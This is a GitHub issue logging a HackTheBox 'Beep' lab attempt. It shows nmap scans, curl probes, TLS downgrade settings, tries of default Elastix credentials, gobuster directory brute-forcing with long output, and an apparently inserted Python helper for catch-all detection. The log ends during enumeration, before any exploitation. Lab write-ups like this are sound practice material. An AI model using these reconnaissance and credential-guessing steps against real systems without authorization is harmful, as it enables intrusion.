roaris / ctf-log


HackTheBox: Beep (Machine Easy) #34

Open roaris opened 3 months ago

roaris commented 3 months ago

https://app.hackthebox.com/machines/Beep

$ nmap -sC -sV -Pn 10.10.10.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-03 14:35 JST
Nmap scan report for 10.10.10.7
Host is up (0.17s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT      STATE    SERVICE    VERSION
22/tcp    open     ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open     smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open     http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open     pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: LOGIN-DELAY(0) PIPELINING APOP RESP-CODES UIDL EXPIRE(NEVER) IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE USER STLS TOP
111/tcp   open     rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            791/udp   status
|_  100024  1            794/tcp   status
143/tcp   open     imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: STARTTLS LISTEXT URLAUTHA0001 IMAP4 OK MULTIAPPEND IDLE NO X-NETSCAPE LIST-SUBSCRIBED ATOMIC CATENATE QUOTA NAMESPACE IMAP4rev1 LITERAL+ SORT=MODSEQ ANNOTATEMORE THREAD=REFERENCES UNSELECT THREAD=ORDEREDSUBJECT SORT ACL CHILDREN ID BINARY RIGHTS=kxte MAILBOX-REFERRALS CONDSTORE UIDPLUS RENAME Completed
443/tcp   open     ssl/http   Apache httpd 2.2.3 ((CentOS))
| http-robots.txt: 1 disallowed entry
|_/
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_http-title: Elastix - Login page
|_ssl-date: 2024-05-03T05:35:02+00:00; -4m41s from scanner time.
|_http-server-header: Apache/2.2.3 (CentOS)
993/tcp   open     ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open     pop3       Cyrus pop3d
1039/tcp  filtered sbl
3306/tcp  open     mysql      MySQL (unauthorized)
4445/tcp  open     upnotifyp?
10000/tcp open     http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: -4m41s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 436.48 seconds
roaris commented 3 months ago

Accessing port 80 redirects to https://10.10.10.7 and ends up on this screen [image]

Accessing port 10000 also ends up on this screen, and clicking the https link gives the same screen as above [image]

$ curl https://10.10.10.7 -v
*   Trying 10.10.10.7:443...
* Connected to 10.10.10.7 (10.10.10.7) port 443
* ALPN: curl offers h2,http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.0 (IN), TLS handshake, Certificate (11):
* TLSv1.0 (OUT), TLS alert, unknown CA (560):
* SSL certificate problem: self-signed certificate
* Closing connection
curl: (60) SSL certificate problem: self-signed certificate
More details here: https://curl.se/docs/sslcerts.html

curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.
$ curl https://10.10.10.7:10000 -v
*   Trying 10.10.10.7:10000...
* Connected to 10.10.10.7 (10.10.10.7) port 10000
* ALPN: curl offers h2,http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.0 (IN), TLS handshake, Certificate (11):
* TLSv1.0 (OUT), TLS alert, unknown CA (560):
* SSL certificate problem: self-signed certificate
* Closing connection
curl: (60) SSL certificate problem: self-signed certificate
More details here: https://curl.se/docs/sslcerts.html

curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.

Even with a self-signed certificate, Chrome normally just shows a warning and still lets you through... It is also odd that it shows ERR_SSL_VERSION_OR_CIPHER_MISMATCH. Looking at the nmap results, under port 443 there is

http-title: Elastix - Login page

and so on.

roaris commented 3 months ago

Apparently adding the -k option to curl lets it ignore certificate errors: https://tech.kurojica.com/archives/25380/

$ curl https://10.10.10.7 -k
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
        <title>Elastix - Login page</title>
...
$ curl https://10.10.10.7:10000 -k
<!doctype html public "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<link rel='stylesheet' type='text/css' href='/unauthenticated/style.css' />
<script type='text/javascript' src='/unauthenticated/toggleview.js'></script>
<script>
var rowsel = new Array();
</script>
<script type='text/javascript' src='/unauthenticated/sorttable.js'></script>
<meta http-equiv="Content-Type" content="text/html; Charset=iso-8859-1">
<title></title>
<title>Login to Webmin</title></head>
...

So the rest is a browser problem, then.

roaris commented 3 months ago

Following the method at https://blog.kyanny.me/entry/2021/11/19/152927, I downloaded the certificate from 10.10.10.7 and tried to register it in Chrome, but it would not register. No error or anything comes up, so there is nothing I can do about it.

roaris commented 3 months ago

I am starting to think the self-signed certificate is not the problem but the TLS version is, since it says ERR_SSL_VERSION_OR_CIPHER_MISMATCH.

roaris commented 3 months ago

https://forum.hackthebox.com/t/beep-broken-ssl/1190/12 This method worked.

In Firefox, type about:config in the address bar and set the following:

security.tls.version.enable-deprecated ---> true
security.tls.version.min --> 1

You get a warning about the self-signed certificate, but clicking Accept the Risk and Continue is fine.

roaris commented 3 months ago

https://10.10.10.7 shows the Elastix login page and https://10.10.10.7:10000 shows the Webmin login page. SecLists has no credentials for either:

$ find /usr/share/SecLists -iname *elastix*
$ find /usr/share/SecLists -iname *webmin*

https://telephonesystemsservices.co.uk/what-are-the-default-elastix-passwords/ says the default Elastix credentials are admin / palosanto, so I tried them, but could not log in. A quick search did not turn up default Webmin credentials. For now I also tried SQL injection with the username admin, but again could not log in.

roaris commented 3 months ago

Run gobuster. As with curl, the -k option ignores certificate errors. Still slow (not gobuster's fault, though).

$ gobuster dir --url https://10.10.10.7 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.7
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
/help                 (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
/themes               (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
/modules              (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/mail                 (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
/admin                (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/static               (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
/lang                 (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
/var                  (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
/panel                (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
Progress: 7014 / 87665 (8.00%)

Port 10000 returns 200 even for nonexistent URLs, so gobuster errors out.

$ gobuster dir --url https://10.10.10.7:10000/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.7:10000/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================

Error: the server returns a status code that matches the provided options for non existing urls. https://10.10.10.7:10000/f0e06973-d437-4f4c-818f-bbd351272776 => 200 (Length: 2375). To continue please exclude the status code or the length

For now, look into what came up on port 443.
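The gobuster abort on port 10000 is its catch-all calibration: a random path got a 200 of 2375 bytes, so the status code alone cannot separate hits from misses. The script below is an added example, not from the issue or from gobuster, that reproduces that calibration step and the usual way past it (treat the baseline status and length as "not found"). The fetch function is injected so it runs offline against a constructed fake server; the known path and the 1540-byte size are made up for the demo.

```python
"""Detect a catch-all (wildcard) response before directory brute-forcing.

Added example, not part of the original issue. The fetch callable is
injected so the logic runs offline against a constructed fake server;
swap in a real HTTP client to probe a live host.
"""
import uuid
from typing import Callable, List, NamedTuple, Optional


class Response(NamedTuple):
    status: int
    length: int


Fetcher = Callable[[str], Response]


def probe_catchall(fetch: Fetcher, base_url: str, samples: int = 3) -> Optional[Response]:
    """Request a few random paths that cannot be in any wordlist.

    Returns the (status, length) every probe shares when the server answers
    nonexistent paths with a consistent non-404 page, i.e. a catch-all.
    Returns None when the server 404s properly, or when the random paths get
    differing answers (then neither status nor length is a safe filter).
    """
    answers = {fetch(f"{base_url.rstrip('/')}/{uuid.uuid4().hex}") for _ in range(samples)}
    if len(answers) != 1:
        return None
    baseline = answers.pop()
    return None if baseline.status == 404 else baseline


def enumerate_dirs(fetch: Fetcher, base_url: str, words: List[str]) -> List[str]:
    """Return wordlist entries whose response differs from the catch-all baseline."""
    baseline = probe_catchall(fetch, base_url)
    hits = []
    for word in words:
        resp = fetch(f"{base_url.rstrip('/')}/{word}")
        if resp.status == 404:
            continue
        # With a catch-all, a hit must differ in status or size; without one, any non-404 counts.
        if baseline is not None and resp == baseline:
            continue
        hits.append(word)
    return hits


def _path_of(url: str) -> str:
    # "https://host:port/a/b" -> "a/b"; the scheme's "//" accounts for the first two slashes.
    return url.split("/", 3)[3] if url.count("/") >= 3 else ""


# Constructed fake server mimicking the port-10000 behaviour seen above:
# unknown paths get a 200 of 2375 bytes (the size gobuster reported);
# the one real file and its 1540-byte size are invented for the demo.
KNOWN_PATHS = {"unauthenticated/style.css": Response(200, 1540)}


def fake_webmin(url: str) -> Response:
    return KNOWN_PATHS.get(_path_of(url), Response(200, 2375))


def fake_strict(url: str) -> Response:
    """Constructed server that 404s properly, so no baseline is established."""
    return KNOWN_PATHS.get(_path_of(url), Response(404, 292))


if __name__ == "__main__":
    words = ["images", "help", "unauthenticated/style.css", "admin"]
    print(probe_catchall(fake_webmin, "https://10.10.10.7:10000"))
    print(enumerate_dirs(fake_webmin, "https://10.10.10.7:10000", words))
```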

roaris commented 3 months ago

The important-looking ones are /mail/ and /admin/. /mail/ shows the Roundcube login page. /admin/ asks for Basic auth and, when that fails, shows the FreePBX page.

SecLists has a directory-enumeration file for Roundcube, so run gobuster with it:

$ find /usr/share/SecLists -iname *round*
/usr/share/SecLists/Discovery/Web-Content/Roundcube-123.txt
$ head  /usr/share/SecLists/Discovery/Web-Content/Roundcube-123.txt
.htaccess
bin/cleandb.sh
bin/cssshrink.sh
bin/decrypt.sh
bin/deluser.sh
bin/dumpschema.sh
bin/gc.sh
bin/indexcontacts.sh
bin/initdb.sh
bin/installto.sh
$ gobuster dir --url https://10.10.10.7/mail/ --wordlist /usr/share/SecLists/Discovery/Web-Content/Roundcube-123.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.7/mail/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/Roundcube-123.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 292]
/bin/msgexport.sh     (Status: 200) [Size: 3980]
/bin/msgimport.sh     (Status: 200) [Size: 3269]
/bin/update.sh        (Status: 200) [Size: 4022]
/CHANGELOG            (Status: 200) [Size: 2926]
/config/.htaccess     (Status: 403) [Size: 299]
/config/config.inc.php.sample (Status: 403) [Size: 311]
/config/defaults.inc.php (Status: 403) [Size: 306]
/config/mimetypes.php (Status: 403) [Size: 303]
/INSTALL              (Status: 200) [Size: 7645]
/installer/check.php  (Status: 200) [Size: 116]
/installer/client.js  (Status: 200) [Size: 755]
/installer/images/add.png (Status: 200) [Size: 733]
/installer/config.php (Status: 200) [Size: 87]
/index.php            (Status: 200) [Size: 2411]
/installer/images/delete.png (Status: 200) [Size: 715]
/installer/images/error.png (Status: 200) [Size: 666]
/installer/index.php  (Status: 302) [Size: 0] [--> ./?_step=1]
/LICENSE              (Status: 200) [Size: 17987]
/installer/test.php   (Status: 200) [Size: 77]
/installer/styles.css (Status: 200) [Size: 3384]
/logs/.htaccess       (Status: 403) [Size: 297]
/plugins/additional_message_headers/additional_message_headers.php (Status: 200) [Size: 0]
/plugins/archive/archive.js (Status: 200) [Size: 1298]
/plugins/archive/archive.php (Status: 200) [Size: 0]
/plugins/archive/localization/cs_CZ.inc (Status: 200) [Size: 979]
/plugins/archive/localization/de_CH.inc (Status: 200) [Size: 175]
/plugins/archive/localization/de_DE.inc (Status: 200) [Size: 175]
/plugins/archive/localization/en_US.inc (Status: 200) [Size: 164]
/plugins/archive/localization/et_EE.inc (Status: 200) [Size: 163]
/plugins/archive/localization/fr_FR.inc (Status: 200) [Size: 170]
/plugins/archive/localization/pl_PL.inc (Status: 200) [Size: 170]
/plugins/archive/localization/ru_RU.inc (Status: 200) [Size: 215]
/plugins/autologon/autologon.php (Status: 200) [Size: 0]
/plugins/database_attachments/database_attachments.php (Status: 200) [Size: 0]
/plugins/debug_logger/debug_logger.php (Status: 200) [Size: 0]
/plugins/debug_logger/runlog/runlog.php (Status: 200) [Size: 0]
/plugins/emoticons/emoticons.php (Status: 200) [Size: 0]
/plugins/example_addressbook/example_addressbook.php (Status: 200) [Size: 0]
/plugins/example_addressbook/example_addressbook_backend.php (Status: 200) [Size: 0]
/plugins/filesystem_attachments/filesystem_attachments.php (Status: 200) [Size: 0]
/plugins/help/config.inc.php.dist (Status: 200) [Size: 2]
/plugins/help/content/license.html (Status: 200) [Size: 15997]
/plugins/help/help.php (Status: 200) [Size: 0]
/plugins/help/localization/cs_CZ.inc (Status: 200) [Size: 935]
/plugins/help/localization/en_GB.inc (Status: 200) [Size: 116]
/plugins/help/localization/en_US.inc (Status: 200) [Size: 116]
/plugins/help/localization/et_EE.inc (Status: 200) [Size: 125]
/plugins/help/localization/hu_HU.inc (Status: 200) [Size: 124]
/plugins/help/localization/pl_PL.inc (Status: 200) [Size: 124]
/plugins/help/localization/sv_SE.inc (Status: 200) [Size: 114]
/plugins/http_authentication/http_authentication.php (Status: 200) [Size: 0]
/plugins/managesieve/Changelog (Status: 200) [Size: 3289]
/plugins/managesieve/config.inc.php.dist (Status: 200) [Size: 0]
/plugins/managesieve/localization/bg_BG.inc (Status: 200) [Size: 3192]
/plugins/managesieve/localization/cs_CZ.inc (Status: 200) [Size: 2613]
/plugins/managesieve/localization/de_CH.inc (Status: 200) [Size: 2505]
/plugins/managesieve/localization/de_DE.inc (Status: 200) [Size: 2538]
/plugins/managesieve/localization/el_GR.inc (Status: 200) [Size: 3693]
/plugins/managesieve/localization/en_GB.inc (Status: 200) [Size: 2413]
/plugins/managesieve/localization/en_US.inc (Status: 200) [Size: 2413]
/plugins/managesieve/localization/es_ES.inc (Status: 200) [Size: 2669]
/plugins/managesieve/localization/et_EE.inc (Status: 200) [Size: 2419]
/plugins/managesieve/localization/fi_FI.inc (Status: 200) [Size: 2247]
/plugins/managesieve/localization/fr_FR.inc (Status: 200) [Size: 2710]
/plugins/managesieve/localization/hu_HU.inc (Status: 200) [Size: 2649]
/plugins/managesieve/localization/it_IT.inc (Status: 200) [Size: 2699]
/plugins/managesieve/localization/nl_NL.inc (Status: 200) [Size: 2287]
/plugins/managesieve/localization/pl_PL.inc (Status: 200) [Size: 2648]
/plugins/managesieve/localization/pt_BR.inc (Status: 200) [Size: 2611]
/plugins/managesieve/localization/ru_RU.inc (Status: 200) [Size: 3500]
/plugins/managesieve/localization/sl_SI.inc (Status: 200) [Size: 2625]
/plugins/managesieve/localization/sv_SE.inc (Status: 200) [Size: 2465]
/plugins/managesieve/localization/uk_UA.inc (Status: 200) [Size: 3366]
/plugins/managesieve/localization/zh_CN.inc (Status: 200) [Size: 2120]
/plugins/managesieve/managesieve.js (Status: 200) [Size: 11580]
/plugins/managesieve/managesieve.php (Status: 200) [Size: 0]
/plugins/markasjunk/localization/cs_CZ.inc (Status: 200) [Size: 949]
/plugins/markasjunk/localization/en_US.inc (Status: 200) [Size: 131]
/plugins/markasjunk/localization/et_EE.inc (Status: 200) [Size: 137]
/plugins/markasjunk/localization/pl_PL.inc (Status: 200) [Size: 137]
/plugins/markasjunk/localization/ru_RU.inc (Status: 200) [Size: 161]
/plugins/markasjunk/localization/sv_SE.inc (Status: 200) [Size: 143]
/plugins/markasjunk/markasjunk.js (Status: 200) [Size: 930]
/plugins/markasjunk/markasjunk.php (Status: 200) [Size: 0]
/plugins/new_user_dialog/localization/de_CH.inc (Status: 200) [Size: 210]
/plugins/new_user_dialog/localization/de_DE.inc (Status: 200) [Size: 210]
/plugins/new_user_dialog/localization/en_US.inc (Status: 200) [Size: 184]
/plugins/new_user_dialog/localization/et_EE.inc (Status: 200) [Size: 183]
/plugins/new_user_dialog/localization/pl_PL.inc (Status: 200) [Size: 186]
/plugins/new_user_dialog/localization/ru_RU.inc (Status: 200) [Size: 257]
/plugins/new_user_dialog/localization/sv_SE.inc (Status: 200) [Size: 227]
/plugins/new_user_dialog/new_user_dialog.php (Status: 200) [Size: 0]
/plugins/new_user_dialog/newuserdialog.css (Status: 200) [Size: 1093]
/plugins/new_user_identity/new_user_identity.php (Status: 200) [Size: 0]
/plugins/password/config.inc.php.dist (Status: 200) [Size: 0]
/plugins/password/drivers/cpanel.php (Status: 200) [Size: 0]
/plugins/password/drivers/directadmin.php (Status: 200) [Size: 0]
/plugins/password/drivers/ldap.php (Status: 200) [Size: 0]
/plugins/password/drivers/poppassd.php (Status: 200) [Size: 0]
/plugins/password/drivers/sasl.php (Status: 200) [Size: 0]
/plugins/password/drivers/sql.php (Status: 200) [Size: 0]
/plugins/password/drivers/vpopmaild.php (Status: 200) [Size: 0]
/plugins/password/drivers/ximss.php (Status: 200) [Size: 0]
/plugins/password/localization/bg_BG.inc (Status: 200) [Size: 962]
/plugins/password/localization/cs_CZ.inc (Status: 200) [Size: 902]
/plugins/password/localization/da_DK.inc (Status: 200) [Size: 794]
/plugins/password/localization/de_CH.inc (Status: 200) [Size: 803]
/plugins/password/localization/de_DE.inc (Status: 200) [Size: 803]
/plugins/password/localization/en_US.inc (Status: 200) [Size: 923]
/plugins/password/localization/et_EE.inc (Status: 200) [Size: 642]
/plugins/password/localization/fr_FR.inc (Status: 200) [Size: 894]
/plugins/password/localization/hu_HU.inc (Status: 200) [Size: 671]
/plugins/password/localization/it_IT.inc (Status: 200) [Size: 782]
/plugins/password/localization/nl_NL.inc (Status: 200) [Size: 683]
/plugins/password/localization/pl_PL.inc (Status: 200) [Size: 941]
/plugins/password/localization/pt_BR.inc (Status: 200) [Size: 759]
/plugins/password/localization/pt_PT.inc (Status: 200) [Size: 773]
/plugins/password/localization/sl_SI.inc (Status: 200) [Size: 761]
/plugins/password/localization/sv_SE.inc (Status: 200) [Size: 795]
/plugins/password/password.js (Status: 200) [Size: 1809]
/plugins/password/password.php (Status: 200) [Size: 0]
/plugins/password/README (Status: 200) [Size: 7014]
/plugins/show_additional_headers/show_additional_headers.php (Status: 200) [Size: 0]
/plugins/squirrelmail_usercopy/config.inc.php.dist (Status: 200) [Size: 0]
/plugins/squirrelmail_usercopy/squirrelmail_usercopy.php (Status: 200) [Size: 0]
/plugins/subscriptions_option/localization/cs_CZ.inc (Status: 200) [Size: 913]
/plugins/subscriptions_option/localization/de_CH.inc (Status: 200) [Size: 99]
/plugins/subscriptions_option/localization/de_DE.inc (Status: 200) [Size: 99]
/plugins/subscriptions_option/localization/en_US.inc (Status: 200) [Size: 91]
/plugins/subscriptions_option/localization/et_EE.inc (Status: 200) [Size: 90]
/plugins/subscriptions_option/localization/pl_PL.inc (Status: 200) [Size: 93]
/plugins/subscriptions_option/localization/ru_RU.inc (Status: 200) [Size: 115]
/plugins/subscriptions_option/localization/sv_SE.inc (Status: 200) [Size: 97]
/plugins/subscriptions_option/subscriptions_option.php (Status: 200) [Size: 0]
/plugins/userinfo/localization/cs_CZ.inc (Status: 200) [Size: 1045]
/plugins/userinfo/localization/de_CH.inc (Status: 200) [Size: 190]
/plugins/userinfo/localization/en_US.inc (Status: 200) [Size: 182]
/plugins/userinfo/localization/et_EE.inc (Status: 200) [Size: 191]
/plugins/userinfo/localization/pl_PL.inc (Status: 200) [Size: 200]
/plugins/userinfo/localization/pt_PT.inc (Status: 200) [Size: 210]
/plugins/userinfo/localization/sv_SE.inc (Status: 200) [Size: 188]
/plugins/userinfo/userinfo.js (Status: 200) [Size: 788]
/plugins/userinfo/userinfo.php (Status: 200) [Size: 0]
/plugins/vcard_attachments/localization/de_CH.inc (Status: 200) [Size: 164]
/plugins/vcard_attachments/localization/de_DE.inc (Status: 200) [Size: 164]
/plugins/vcard_attachments/localization/en_US.inc (Status: 200) [Size: 134]
/plugins/vcard_attachments/localization/ru_RU.inc (Status: 200) [Size: 170]
/plugins/vcard_attachments/vcard_attachments.php (Status: 200) [Size: 0]
/plugins/vcard_attachments/vcardattach.js (Status: 200) [Size: 245]
/program/include/rcmail.php (Status: 200) [Size: 0]
/program/include/iniset.php (Status: 200) [Size: 0]
/program/js/common.js (Status: 200) [Size: 11303]
/program/js/editor.js (Status: 200) [Size: 4620]
/program/js/googiespell.js (Status: 200) [Size: 21405]
/program/js/list.js   (Status: 200) [Size: 14001]
/program/js/app.js    (Status: 200) [Size: 89866]
/program/localization/ar_SA/labels.inc (Status: 200) [Size: 13102]
/program/localization/ar_SA/messages.inc (Status: 200) [Size: 7715]
/program/localization/ast/labels.inc (Status: 200) [Size: 12145]
/program/localization/ast/messages.inc (Status: 200) [Size: 7468]
/program/localization/az_AZ/labels.inc (Status: 200) [Size: 11631]
/program/localization/az_AZ/messages.inc (Status: 200) [Size: 6646]
/program/localization/bg_BG/labels.inc (Status: 200) [Size: 15024]
/program/localization/bg_BG/messages.inc (Status: 200) [Size: 9916]
/program/localization/bn_BD/labels.inc (Status: 200) [Size: 18562]
/program/localization/bn_BD/messages.inc (Status: 200) [Size: 10536]
/program/localization/br/labels.inc (Status: 200) [Size: 7654]
/program/localization/br/messages.inc (Status: 200) [Size: 5048]
/program/localization/bs_BA/labels.inc (Status: 200) [Size: 7736]
/program/localization/bs_BA/messages.inc (Status: 200) [Size: 4212]
/program/localization/ca_ES/labels.inc (Status: 200) [Size: 12226]
/program/localization/ca_ES/messages.inc (Status: 200) [Size: 7516]
/program/localization/cs_CZ/labels.inc (Status: 200) [Size: 12190]
/program/localization/cs_CZ/messages.inc (Status: 200) [Size: 7672]
/program/localization/cy_GB/labels.inc (Status: 200) [Size: 11978]
/program/localization/cy_GB/messages.inc (Status: 200) [Size: 7524]
/program/localization/da_DK/labels.inc (Status: 200) [Size: 11099]
/program/localization/da_DK/messages.inc (Status: 200) [Size: 6524]
/program/localization/de_CH/labels.inc (Status: 200) [Size: 12239]
/program/localization/de_CH/messages.inc (Status: 200) [Size: 7883]
/program/localization/de_DE/labels.inc (Status: 200) [Size: 12119]
/program/localization/de_DE/messages.inc (Status: 200) [Size: 7873]
/program/localization/el_GR/labels.inc (Status: 200) [Size: 13820]
/program/localization/el_GR/messages.inc (Status: 200) [Size: 7440]
/program/localization/en_GB/labels.inc (Status: 200) [Size: 10979]
/program/localization/en_GB/messages.inc (Status: 200) [Size: 6914]
/program/localization/en_US/labels.inc (Status: 200) [Size: 12012]
/program/localization/en_US/messages.inc (Status: 200) [Size: 7216]
/program/localization/eo/labels.inc (Status: 200) [Size: 9372]
/program/localization/eo/messages.inc (Status: 200) [Size: 5097]
/program/localization/es_AR/labels.inc (Status: 200) [Size: 12514]
/program/localization/es_AR/messages.inc (Status: 200) [Size: 7836]
/program/localization/es_ES/labels.inc (Status: 200) [Size: 12107]
/program/localization/es_ES/messages.inc (Status: 200) [Size: 7881]
/program/localization/et_EE/labels.inc (Status: 200) [Size: 11767]
/program/localization/et_EE/messages.inc (Status: 200) [Size: 7326]
/program/localization/eu_ES/labels.inc (Status: 200) [Size: 9869]
/program/localization/eu_ES/messages.inc (Status: 200) [Size: 5305]
/program/localization/fa_AF/labels.inc (Status: 200) [Size: 14692]
/program/localization/fa_AF/messages.inc (Status: 200) [Size: 8019]
/program/localization/fi_FI/labels.inc (Status: 200) [Size: 11751]
/program/localization/fi_FI/messages.inc (Status: 200) [Size: 6650]
/program/localization/fr_FR/labels.inc (Status: 200) [Size: 12313]
/program/localization/fr_FR/messages.inc (Status: 200) [Size: 7771]
/program/localization/ga_IE/labels.inc (Status: 200) [Size: 7697]
/program/localization/ga_IE/messages.inc (Status: 200) [Size: 5372]
/program/localization/gl_ES/labels.inc (Status: 200) [Size: 12192]
/program/localization/gl_ES/messages.inc (Status: 200) [Size: 7430]
/program/localization/he_IL/labels.inc (Status: 200) [Size: 13480]
/program/localization/he_IL/messages.inc (Status: 200) [Size: 8070]
/program/localization/hi_IN/labels.inc (Status: 200) [Size: 10595]
/program/localization/hi_IN/messages.inc (Status: 200) [Size: 6004]
/program/localization/hr_HR/labels.inc (Status: 200) [Size: 10796]
/program/localization/hr_HR/messages.inc (Status: 200) [Size: 6164]
/program/localization/hu_HU/labels.inc (Status: 200) [Size: 12881]
/program/localization/hu_HU/messages.inc (Status: 200) [Size: 7551]
/program/localization/hy_AM/labels.inc (Status: 200) [Size: 13933]
/program/localization/hy_AM/messages.inc (Status: 200) [Size: 7652]
/program/localization/id_ID/labels.inc (Status: 200) [Size: 11863]
/program/localization/id_ID/messages.inc (Status: 200) [Size: 6922]
/program/localization/index.inc (Status: 200) [Size: 4603]
/program/localization/is_IS/labels.inc (Status: 200) [Size: 11120]
/program/localization/is_IS/messages.inc (Status: 200) [Size: 3699]
/program/localization/it_IT/labels.inc (Status: 200) [Size: 12041]
/program/localization/it_IT/messages.inc (Status: 200) [Size: 7551]
/program/localization/ja_JP/labels.inc (Status: 200) [Size: 12494]
/program/localization/ja_JP/messages.inc (Status: 200) [Size: 8565]
/program/localization/ka_GE/labels.inc (Status: 200) [Size: 18962]
/program/localization/ka_GE/messages.inc (Status: 200) [Size: 12501]
/program/localization/ko_KR/labels.inc (Status: 200) [Size: 11637]
/program/localization/ko_KR/messages.inc (Status: 200) [Size: 6965]
/program/localization/ku/labels.inc (Status: 200) [Size: 8140]
/program/localization/ku/messages.inc (Status: 200) [Size: 5027]
/program/localization/lt_LT/labels.inc (Status: 200) [Size: 12247]
/program/localization/lt_LT/messages.inc (Status: 200) [Size: 7404]
/program/localization/lv_LV/labels.inc (Status: 200) [Size: 11775]
/program/localization/lv_LV/messages.inc (Status: 200) [Size: 6769]
/program/localization/mk_MK/labels.inc (Status: 200) [Size: 14445]
/program/localization/mk_MK/messages.inc (Status: 200) [Size: 8588]
/program/localization/mr_IN/labels.inc (Status: 200) [Size: 18090]
/program/localization/mr_IN/messages.inc (Status: 200) [Size: 11279]
/program/localization/ms_MY/labels.inc (Status: 200) [Size: 9071]
/program/localization/ms_MY/messages.inc (Status: 200) [Size: 5024]
/program/localization/nb_NO/labels.inc (Status: 200) [Size: 11365]
/program/localization/nb_NO/messages.inc (Status: 200) [Size: 7143]
/program/localization/ne_NP/labels.inc (Status: 200) [Size: 11183]
/program/localization/ne_NP/messages.inc (Status: 200) [Size: 7375]
/program/localization/nl_BE/labels.inc (Status: 200) [Size: 11385]
/program/localization/nl_BE/messages.inc (Status: 200) [Size: 5365]
/program/localization/nl_NL/labels.inc (Status: 200) [Size: 12247]
/program/localization/nl_NL/messages.inc (Status: 200) [Size: 7514]
/program/localization/nn_NO/labels.inc (Status: 200) [Size: 10245]
/program/localization/nn_NO/messages.inc (Status: 200) [Size: 5563]
/program/localization/pl_PL/labels.inc (Status: 200) [Size: 12405]
/program/localization/pl_PL/messages.inc (Status: 200) [Size: 7795]
/program/localization/ps/labels.inc (Status: 200) [Size: 13704]
/program/localization/ps/messages.inc (Status: 200) [Size: 7563]
/program/localization/pt_BR/labels.inc (Status: 200) [Size: 12437]
/program/localization/pt_BR/messages.inc (Status: 200) [Size: 7927]
/program/localization/pt_PT/labels.inc (Status: 200) [Size: 12112]
/program/localization/pt_PT/messages.inc (Status: 200) [Size: 7540]
